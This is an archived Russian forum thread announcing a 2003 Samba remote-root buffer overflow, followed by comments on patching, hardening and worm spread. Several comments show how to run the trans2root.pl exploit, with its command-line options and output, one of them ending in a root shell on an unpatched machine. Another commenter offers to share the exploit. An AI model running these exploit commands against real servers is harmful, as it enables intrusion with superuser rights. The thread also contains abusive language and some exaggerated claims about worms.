LINUX.ORG.RU

Samba: переполнение буфера


0

0

Используя ошибку переполнения буфера, неавторизованный злоумышленник может выполнить произвольный программный код с правами суперпользователя на стороне сервера.

Всем пользователям Samba настоятельно рекомендуется обновить их ПО до исправленных версий.

Версии: Samba < 2.2.8a; Samba-TNG < 0.3.2

>>> Подробности



Проверено: maxcom

во весело, то sendmail, то ядро, теперь вот samba, и главное ко всему есть exploit'ы, осталось найти дыры в ssh и apache, тогда будет полный порядок

anonymous
()

to anonymous (*) (2003-04-08 11:02:41.074) А с чего вы взяли, что к ssh и Apache нет exploit'ов? :)

anonymous
()

Блин да достали уже всё баги искать - обновляться не успеваю :)

P.S. всё защищённее и защищённее !

anonymous
()

я не понял смайлика у последнего анонимуса.. меня это все повергает в уныние просто :(

qrot
()

хе-хе, эксплойтик-то убрали %)

anonymous
()

чо ноете та. ставьте патчи на ядро типа openwall или grsec, фаервольте систему, всё что можно - в jail, /bin/sh (bash итд) переименовать в чота другое итд...

после чего можете хуй забить на все эти дыры и патчиться неспеша в течении недель, а не выпучив глаза и зажав жопу через час после очередной дырки...

sg
()

>и патчиться неспеша в течении недель

До кому дело есть до ваших настольных компьютеров с установленным Doom и Quake. Че вы паритесь, можете не обновляться вообще. Кому вы навиг сдались с вашими коллекциями "клубники". Сидите и не пердите.

anonymous
()

> Кому вы навиг сдались..
мля, если бы кому сдались то и так бы сломали. а так кулкакер из ПТУ придет домой, качнет эксплойт, применит ко всей сетке в разных позах - и пиздец. у этих же, блядь, ублюдков ни мозгов, ни хуя нет.. потом ищи этого мудака еще

anonymous
()

сраная самба... дырявее может быть только семейство bind & sendmail ;]

Rost ★★★★★
()

Ya ego uspel skachat, esli nuzhen komu mogu vilozhit

anonymous
()

весна! Все живое ищет дырки...

oduvan
()

ok, домой приду, выложу

anonymous
()
Ответ на: комментарий от anonymous


"До кому дело есть до ваших настольных компьютеров с установленным Doom и Quake. Че вы паритесь, можете не обновляться вообще. Кому вы навиг сдались с вашими коллекциями "клубники". Сидите и не пердите."

Не, ну надо же быть таким непроходимо тупым :(

Есле тебе через дырочку засунут rootkit? А как несчет рассылки
спама с твоего компа ? Так же твой комп неплохо подойдет как
свалка для порнухи и вареза, да и пару тулз для DoS с твоего
компа тоже могут положить.

anonymous
()

пароли в инет опять же никто не откажется спереть.

jackill ★★★★★
()

>Есле тебе через дырочку засунут rootkit?

Да, типа крутому кулхацкеру больше делать нефиг как из милиарда компов искать и ломать именно твой. И только ради того чтобы выложить туда варез или рассылать спам. У тебе шанс что это произойдет 0.000...1 % Ты больше будешь над своими *.jpg трястись чем реально это может произойти. Тот кто напишет крутой exploit будет интересоватся в первую очередь не твоим компом на отшибе с коллекцией парнухи, а чем нибудь по серьезнее. А если ломать все и всех, то очень cкоро его exploit будет не exploit а update. И тогда exploit писатель отсосет, потратив еще дохрина времени чтобы хоть еще где-нибудь дыру найти. Так что с хорошим exploit'ом он к тебе не полезет. Типа твою тачку, по десять раз на дню всякие нихорошие хацкеры пытаются заломать. А ты реально крутой боец в дырявой майке пытаешься отстоять коллекцию порнухи на своем компе. Тоже мне www.microsoft.com

anonymous
()

Прикрутил grsecurity и эксплойты перестали работать, теперь своего дебианца обновляю неспеша, чего суетиться ?

penguin
()
Ответ на: po-moemu tut sidit odno losh'e. от anonymous

О, бля, невъзёбный бивень с транслитом вылез. По делу - а что, кто-то выставляет наружу интерфейсы с разрешенным SMB? Ну знаете..

debosh2k
()

anonymous (*) (2003-04-08 15:00:52.693)

молодой человек неправ в корне. Помниться какие - то перцы, занимающиеся вопросами security провели показательный эксперимент: на четыре машины поставили шляпу 6 и 7, настроили сетку, оставив все остальное по дефалту и воткнули проводок в сетевуху. Первую машину вломали через 6 часов, последнию через 88. Делаем выводы.

Короче, для тех кто в танке. Какой-нибудь очередной автоэксплойт пройдется на автомате по сетке, прощупав все извесные ему(эксплойту) дыры.

penguin
()

А если окромя Самбы ничего на тачке не запущено, то хрен ли там взламывать? Какой к чёрту доступ от рута и где? По протоколу smb на расшареный ресурс? Охуеть! Дыра для долбоёбов.

anonymous
()

онанистам-скептикам: существуют червячки, безобидные и обидные. им похрен васин ли этот домашний компик или сервак крупной конторы. сламер за полчаса по всей планете прошолся...

ну и кроме того тут думаешь только одни коллекционеры порнухи собираются? у меня на десктопе винда - для меня удобнее линуха. а в винде залогиненые консоли к десяткам серверов...

sg
()

Проста самба копирует не только виндовые технологии, но и дыры :)

anonymous
()

slackware + самба из сырцов 2.2.8 - работает
mandrake 9.0 + samba-server-2.2.7-2.1mdk.rpm - работает

roller ★★★
()

slackware 9.0 + самба из сырцов 2.2.8 - работает
mandrake 9.0 + samba-server-2.2.7-2.1mdk.rpm - работает

roller ★★★
()

чем дальше тем хуже,
прав был тот, кто когда-то говорил, что чем популярней становится linux тем больше в нём багов находят, скоро с linux'ом опасно в инет будет выходить

anonymous
()

> прав был тот, кто когда-то говорил, что чем > популярней становится linux тем больше в нём > багов находят, скоро с linux'ом опасно в инет > будет выходить

C'est la vie, друг мой... И меня это радует ибо сама подобная постановка вопроса доказывает, что Linux уже не "неуловимый Джо", а реальная ОС для реальных задач. И оперативность в отлове багов - единственная возможность для Linux-community не скатиться до уровня оффтопика.

Rolex ★★
()

>сламер за полчаса по всей планете прошолся...

Ну что ты гонишь !!! А ? Это просто не реально! Ты хоть представляешь о чем говоришь ? Просто перебрать все IP адреса может и можно за такое время. Но их ведь не просто перебрать надо. Сканирование одного компа может занять полчаса. А весь инет, за пол часа - ты просто идиот. Попробуй набрать nmap на свой комп из под рута. И посмотри. И заткнись про весь инет за пол часа. Одно ламо - честное слово.

anonymous
()
Ответ на: комментарий от anonymous

> Патч на мандрейк 8.2 и больше вышел вчера

а на меньше 8.2 они типа забили???
вот скоты !!!
для Debian 2.2 вон уже 3 (?) года патчи выходят,
и обновления самбы для Debian 2.2 и 3.0 тоже вчера вышли.

anonymous
()
Ответ на: комментарий от anonymous

> а на меньше 8.2 они типа забили???

Не совсем, SNF 7.2 жив пока. А вообще они о "времени жизни" своих дистрибутивов сообщили в рассылке еще в прошлом году. Системные пакеты в 8.2 вроде как прекращаются в октябре, 9.x и MNF подольше поддерживать будут.

hilight
()

Мужики, а как узнать, сработал эксплойт или нет? 
[*] Using target type: linx86
[*] Listener started on port 1981
[*] Starting single shot mode...
[*] Using return address of 0xbffff3ff
И ничего больше...
samba-2.2.1a, RedHat 7.2

Skull ★★★★★
()
Ответ на: комментарий от Skull

запускай так:
./trans2root.pl -M B -t linx86 -H localhost -h localhost

если shell получишь, то значит сработал

anonymous
()

RH 7.2 + Samba 2.2.5 + path "Корзина" - ошибки нет

anonymous
()

ничего не получилось --всё время ругается на несуществующий файл

anonymous
()

> Ну что ты гонишь !!! А ? Это просто не реально! Ты хоть представляешь > о чем говоришь ? Просто перебрать все IP адреса может и можно за > такое время. Но их ведь не просто перебрать надо. Сканирование одного > компа может занять полчаса. А весь инет, за пол часа - ты просто > идиот. Попробуй набрать nmap на свой комп из под рута. И посмотри. И > заткнись про весь инет за пол часа. Одно ламо - честное слово.

Слушай лох, что такое цепная реакция знаешь ? А сканирование одного-единственного порта 139 (а не сотен портов, как делает нмап) сколько времени займет ?

Прикинь, если в каждые 5 секунд зараженный компьютер заражает другой незараженный (5 секунд просто для примера - это определение порта 139 на жертве + попытка эксплойта). Сколько будет зараженных компьютеров через полчаса? Считай 2 в степени 360 (60/5*30=360). Ну так как, полчаса много или мало ?

anonymous
()

Карочи нифига етот эксрлоит удаленно не работает!!!

anonymous
()

./trans2root.pl -M B -t linx86 -H 192.168.50.6 -h 192.168.50.6
[*] Using target type: linx86
[*] Listener started on port 1981
[*] Starting brute force mode...
[*] Return Address: 0xbfffe5ff
[*] Starting Shell 192.168.50.6:43182

--=[ Welcome to vlad (uid=0(root) gid=0(root) groups=65534(nogroup))

^c

[user@vlad download]$

Работает. Мандрейк 9.0 и все остальное - из коробки. НИчего не патчил.

anonymous
()

а где патч лежит?

anonymous
()

2неграмотный-ананист: походу ты кроме нмапа больше ничего и не знаешь, да и нмап заочно изучал. стыдно про сламера ничего не знать... я без всяких новостей в нашей сибирской дыре про него сразу узнал, когда увидел засранную сетку провайдера с подозрительными пакетами на определенный порт, а через часик "повылетали" сервера у мериканского хостера. не, они работали, но каналы были забиты напрочь. пакетлост 75% на обычном пинге это было сильно :) ну отписал заказчику, что вероятнее всего вирусы бесятся, нужно переждать. на следующий день новости подтвердили...

почитай про вирусы. они сами размножаются, а не из логова злого хакера вся планета раком загибается :)

sg
()


Почему самба до сих пор работает по рутом? Пора давно развести
полномочия, как это сделали с ssh.

anonymous
()
Ответ на: комментарий от anonymous

anonymous (*) (2003-04-08 15:00:52.693)

"А ты реально крутой боец в дырявой майке пытаешься отстоять коллекцию порнухи на своем компе."

Глупыш,на майку которую я ношу тебе долго работать придется :)
И продолжай в том же духе, пока к тебе FBI или как там у вас,
ФСБ не нагрянет.

Good luck baby.

anonymous
()
Ответ на: комментарий от anonymous

А никто не пробовал ее допустим под nobody пускать, если все только на чтение расшарено и всем?

sseREGa
()

2sseREGa (*) (2003-04-10 05:01:32.707)

Не совсем понятно, как самба в этом случае сядет на порты. Скорее нужно патчить саму самбу, что бы после бинда выполнялся setuid

penguin
()

самба запускает дочерние процессы от имени подключающихся пользователей. поэтому ей нужны перманентные права r00t'а.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.